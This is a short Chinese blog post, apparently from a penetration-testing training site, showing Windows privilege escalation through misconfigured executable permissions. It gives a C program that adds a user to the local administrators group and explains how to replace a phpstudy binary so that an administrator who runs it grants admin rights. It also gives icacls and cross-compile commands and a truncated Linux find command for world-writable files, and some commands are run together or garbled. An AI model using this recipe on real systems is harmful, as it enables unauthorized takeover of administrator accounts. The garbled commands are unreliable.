利用配置不当提权
【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。
利用管理员对服务器的权限分配不当完成的权限提升(开发者的意识不够强)
一般情况下面 普通用户对程序是没有控制权的
icacls icacls c:\windows\*.exe /save perm /T i586-mingw32msvc-gcc -o admin.exe admin.c (因为exe要给windows用所以这里使用i586-mingw32msvc-gcc这个编译
然后在c盘更目录下面生成了 asd文件 我们用记事本查看 就可以知道每一个exe的权限
但是很遗憾这种情况没有找到
我们看一下我们需要的脚本
#include<stdlib.h> int main() { int i; i=system("net localgroup administrators a /add"); return 0; }
这里为了满足实验要求 我们这里加一个普通用户
这里我们以phpstudy为例子 user配置不当 对他的操作是 完全控制
把我们刚才上传的exe改名为这个
然后当管理点击这个的时候 就是默认吧a加入管理员组
那么在liunx如何提权呐???
find / -perm 777 -exec ls -l {} \
原创文章,作者:moonsec,如若转载,请注明出处:https://www.moonsec.com/3213.html